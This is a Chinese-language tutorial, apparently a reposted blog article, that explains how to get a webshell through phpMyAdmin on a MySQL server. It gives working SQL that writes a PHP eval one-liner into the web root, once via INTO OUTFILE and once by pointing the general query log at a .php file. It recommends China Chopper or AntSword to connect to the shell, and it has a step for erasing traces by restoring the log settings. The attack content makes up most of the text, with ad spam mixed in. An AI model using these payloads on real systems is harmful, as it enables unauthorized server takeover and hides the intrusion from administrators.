phpmyadmin中怎么獲取shell

本篇文章給大家分享的是有關(guān)phpmyadmin中怎么獲取shell，小編覺得挺實(shí)用的，因此分享給大家學(xué)習(xí)，希望大家閱讀完這篇文章后可以有所收獲，話不多說，跟著小編一起來看看吧。

本篇文章給大家分享的是有關(guān)phpmyadmin中怎么獲取shell，小編覺得挺實(shí)用的，因此分享給大家學(xué)習(xí)，希望大家閱讀完這篇文章后可以有所收獲，話不多說，跟著小編一起來看看吧。

一、select into outfile直接寫入1、利用條件

創(chuàng)新互聯(lián)專注于欒川企業(yè)網(wǎng)站建設(shè),響應(yīng)式網(wǎng)站建設(shè),商城開發(fā)。欒川網(wǎng)站建設(shè)公司,為欒川等地區(qū)提供建站服務(wù)。全流程定制網(wǎng)站建設(shè)，專業(yè)設(shè)計(jì)，全程項(xiàng)目跟蹤，創(chuàng)新互聯(lián)專業(yè)和態(tài)度為您提供的服務(wù)

對web目錄需要有寫權(quán)限能夠使用單引號(root)

知道網(wǎng)站絕對路徑(phpinfo/php探針/通過報(bào)錯(cuò)等)

secure_file_priv沒有具體值

2、查看secure_file_priv值show global variables like '%secure%';

關(guān)于secure_file_priv配置介紹：

secure_file_priv 是用來限制 load dumpfile、into outfile、load_file() 函數(shù)在哪個(gè)目錄下?lián)碛猩蟼骰蛘咦x取文件的權(quán)限

當(dāng) secure_file_priv 的值為 NULL ，表示限制 d 不允許導(dǎo)入|導(dǎo)出，此時(shí)無法提權(quán)當(dāng) secure_file_priv 的值為 /tmp/ ，表示限制 mysqld 的導(dǎo)入|導(dǎo)出只能發(fā)生在 /tmp/ 目錄下，此時(shí)也無法提權(quán)當(dāng) secure_file_priv 的值沒有具體值時(shí)，表示不對 mysqld 的導(dǎo)入|導(dǎo)出做限制，此時(shí)可提權(quán)

我這里的secure_file_priv值為NULL，所以不能夠?qū)牖驅(qū)С?/p>

secure_file_priv這個(gè)值是只讀變量，只能通過配置文件修改。如果管理員沒有配置，那么我們是無法進(jìn)行寫入shell的，這里我為了測試能否寫入修改一下

在MySQL的配置文件my.ini中進(jìn)行配置：

修改后secure_file_priv的值如圖所示：

3、寫入一句話select '<?php @eval($POST[1]); ?>' INTO OUTFILE 'D:\\phpStudy\\PHPTutorial\\WWW\\a.php'

這里需要注意的一個(gè)點(diǎn)是路徑需要用"\\"

查看下根目錄

二、利用全局日志寫shell1、查看配置

查看mysql的日志狀態(tài)，默認(rèn)是關(guān)閉的，因?yàn)檫@個(gè)日志的量非常大對資源是一個(gè)比較大的開銷

SHOW VARIABLES LIKE '%general%'

general_log_file為日志保存的位置

2、開啟general_log模式

開啟general_log 的作用：開啟它可以記錄用戶輸入的每條命令，會把其保存在C:\phpStudy\MySQL\data\stu1.log的文件中，其實(shí)就是我們常說的日志文件利用思路：開啟general_log之后把general_log_file的值修改為該網(wǎng)站默認(rèn)路徑下的某一個(gè)自定義的php文件中，然后通過log日志進(jìn)行寫入一句話木馬，然后再進(jìn)一步利用

這里注意：在修改log路徑前，源路徑一定要提前記錄下來，我們獲取shell后還要恢復(fù)原來的路徑

set global general_log = on;

再查看一下日志已經(jīng)開啟，這時(shí)我們就可以通過全局日志寫shell進(jìn)根目錄

3、修改日志目錄為shell地址set global general_log_file='C:\\phpStudy\\MySQL\\data\\shell.php';4、寫入shell

因?yàn)殚_啟了日志記錄功能，所執(zhí)行的sql語句都會被記錄在日志中

select '<?php eval($_POST[cmd]);?>'

查看下日志，發(fā)現(xiàn)sql語句已經(jīng)被記錄到了日志中，直接用菜刀或者蟻劍連接即可

5、抹除痕跡set global general_log_file='C:\\phpStudy\\MySQL\\data\\stu1.log';set global general_log = off;

再使用日志查看命令發(fā)現(xiàn)已經(jīng)恢復(fù)

SHOW VARIABLES LIKE '%general%'

網(wǎng)站欄目：phpmyadmin中怎么獲取shell
當(dāng)前URL：http://muchs.cn/article14/epcsde.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供網(wǎng)站策劃、軟件開發(fā)、做網(wǎng)站、企業(yè)建站、移動(dòng)網(wǎng)站建設(shè)、網(wǎng)站建設(shè)

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來源： 創(chuàng)新互聯(lián)